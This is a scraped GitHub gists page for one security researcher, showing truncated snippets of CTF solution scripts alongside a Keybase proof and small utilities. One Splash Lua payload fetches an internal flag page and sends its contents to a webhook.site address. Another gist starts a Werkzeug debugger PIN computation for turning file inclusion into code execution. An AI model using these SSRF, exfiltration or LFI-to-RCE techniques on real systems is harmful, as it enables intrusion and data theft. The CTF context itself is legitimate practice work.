🐴
horseback riding.....

Mohammed u0pattern

Keybase proof

I hereby claim:

  • I am u0pattern on github.
  • I am u0pattern (https://keybase.io/u0pattern) on keybase.
  • I have a public key ASAWBhITZG9ljyAr3c3o0UZ332als5XXEZ0xrgC3FgFl2Qo

To claim this, I am signing this object:

@u0pattern
u0pattern / interview-solve.py
Last active February 6, 2022 22:48
My solution for bypassing the NX & solving the "interview-opportunity" pwn challenge in DiceCTF
#!/usr/bin/python3
from pwn import *
REMOTE = True
if REMOTE:
    p = remote("mc.ax", 31081)
else:
    p = process('./interview-opportunity')
@u0pattern
u0pattern / ldd.py
Last active February 23, 2023 15:00
Linux's ldd-like implementation in Python
try:
    from elftools.elf.elffile import ELFFile
except ImportError:
    print("You need to install elftools library: pip3 install pyelftools")
    exit()
ELF_FILE = ""  # put the elf file that you want here
with open(ELF_FILE, 'rb') as f:
    elffile = ELFFile(f)
@u0pattern
u0pattern / solve.py
Created May 3, 2021 05:49
[DEFCON CTF quals] - "qoo-or-ooo" chall solution
from binascii import unhexlify
from Crypto.Cipher import AES
import hashlib
from itertools import product
def key_array_to_key_string(key_list):
    key_string_binary = b''.join([bytes([x]) for x in key_list])
    return hashlib.md5(key_string_binary).digest()
def pattern(order):

import requests
from urllib import quote
lua="""
function main(splash)
    local treat = require("treat")
    local json = splash:http_get('http://172.16.0.14/flag.php')
    local response=splash:http_get('https://webhook.site/41ccba09-fd57-439b-b8be-05e20e446b72?flag='.. treat.as_string(json.body))
    return "hi"
end

<?php echo '<html><body><form method="post" action="">Password: <input type="password" name="p"> <input type="submit"></form></body></html>' ?>
<?php if($_POST['p']){if($_POST['p']==='p4ssw0rd'){ echo '<font color="green">Logged in</font>' ?>
<?php }else{ echo '<font color="red">Failed</font>' ?>
<?php }} ?>

import base64,requests,binascii,string
flag = 'flag'
for i in range(len(flag), 16):
    salt = 'x' * (16 - 1 - i)
    known = binascii.hexlify(base64.b64decode(requests.get('https://obscure-river-88658.herokuapp.com/?sugar='+salt).text))
    for c in string.printable:
        unknown = binascii.hexlify(base64.b64decode(requests.get('https://obscure-river-88658.herokuapp.com/?sugar='+(salt+flag+c)).text))
        if known[:16] == unknown[:16]:
            flag += c
            print(flag)

<html>
<head>
<script src='https://code.responsivevoice.org/responsivevoice.js?key=WGciAW2s'></script>
</head>
<body>
<input onclick="responsiveVoice.speak('أهلا وسهلا','Arabic Male');" type="button" value="Play" />
</body>
</html>

<?php
# 1337r00t\.me >> you can change it to your own host (or you can use the parse_url($_SERVER['HTTP_REFERER'],PHP_URL_HOST) function instead of the regex)
if(!isset($_SERVER['HTTP_REFERER']) || !preg_match('/^(?:http(?:s)?:\/\/)?(?:[^\.]+\.)?1337r00t\.me\/(.*)/',$_SERVER['HTTP_REFERER'])){
    exit('<script>window.location.replace("'.htmlspecialchars("https://1337r00t.me/".substr($_SERVER['REQUEST_URI'],1)).'");</script>');
}
?>
@u0pattern
u0pattern / LFI2RCEonWerkzeug.py
Created January 2, 2020 11:42
Now you can get RCE from LFI without needing to know the value of the environment variables.
import hashlib
public_bits = [
    'testUser',  # username /etc/passwd
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.5/dist-packages/flask/app.py'
]
private_bits = [